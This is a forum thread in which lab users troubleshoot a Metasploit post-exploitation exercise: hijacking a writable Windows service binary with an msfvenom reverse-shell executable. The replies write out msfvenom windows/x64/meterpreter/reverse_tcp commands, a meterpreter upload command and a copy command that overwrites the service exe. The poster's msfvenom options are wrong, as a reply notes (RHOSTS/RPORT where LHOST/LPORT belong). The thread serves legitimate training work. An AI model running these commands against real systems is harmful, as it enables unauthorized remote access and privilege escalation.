Forum Discussion

pwn6394's avatar
pwn6394
Icon for Bronze I rankBronze I
23 days ago
Solved

Ep 7 Post Exploitation With Metasploit

I’m having issues with q9 and don’t know why what I’m currently doing isn’t working.

I’ve ran SharpUp.exe and found a vulnerable binary location (C:/Windows/Important-Service/Important-Service.exe).

From my original meterpreter session, I have uploaded a new msfvenom payload called Important-Service.exe to the location above, with hope to spawn a new shell on another listener.

Nothing is happening when I start the service or execute the exe. Any pointers with this one? I feel that what I am doing is correct and should work.

5 Replies

  • You've definitely overwritten the existing binary in the C:\Windows\Important-Service\ folder? You're sure your binary is on the box and [more importantly] in the correct place (I used meterpreter's "upload" command to get in on the box, then spawned a shell and manually used "copy" to move it (it should ask you if you're sure you want to overwrite the original file))? 

    What payload are you using for msfvenom? Checking my limited notes, the screenshots definitely show a windows/x64/meterpreter/reverse_tcp session coming back after I'd uploaded the exe file and manually copied it over the existing one. Only possible thing I can think of (that I've done myself in the past) is a mismatch between x86 and x64 payloads on opposite ends of your meterpreter session? 

    • pwn6394's avatar
      pwn6394
      Icon for Bronze I rankBronze I

      Evening. Yes, I've overwritten the existing binary using a new .exe I created (below). I used a basic shell rather than Meterpreter to copy it across once on the box (using Meterpreter upload) and got confirmation of the overwrite (below). Still not getting a reverse shell back on my second listener. I've manually tried to start the service; but that fails to get the session. Is there anything else that I'm missing? I have confirmed that the architecture is x64, so my payload should work. Do you have to run the execute_dotnet_assembly module again, or other Meterpreter modules? Thank you. It will be something really silly that I have overlooked.

      msfvenom -p windows/x64/meterpreter/reverse_tcp RPORT=5555 RHOSTS=10.102.***.*** -f exe -o Important-Service.exe

      copy /v Important-Service.exe C:\Windows\Important-Service

      • autom8on's avatar
        autom8on
        Icon for Silver I rankSilver I

        Erm, shouldn't those be LHOST/LPORT?

  • Thanks for getting back to me. As far as I’m aware, my upload is going to the correct directory. I’m using the following command in my meterpreter session, with my msfvenom payload the same as you mention. I’ll have another play later on; it’s most likely not being uploaded to the correct location, as I don’t get an overwrite prompt. Thank you.

    upload Important-Service.exe C:/Windows/Important-Service/Important-Service.exe

    msfvenom -p windows/x64/meterpreter/reverse_tcp RPORT=1234 RHOSTS=10.102.118.165 -f exe -o Important-Service.exe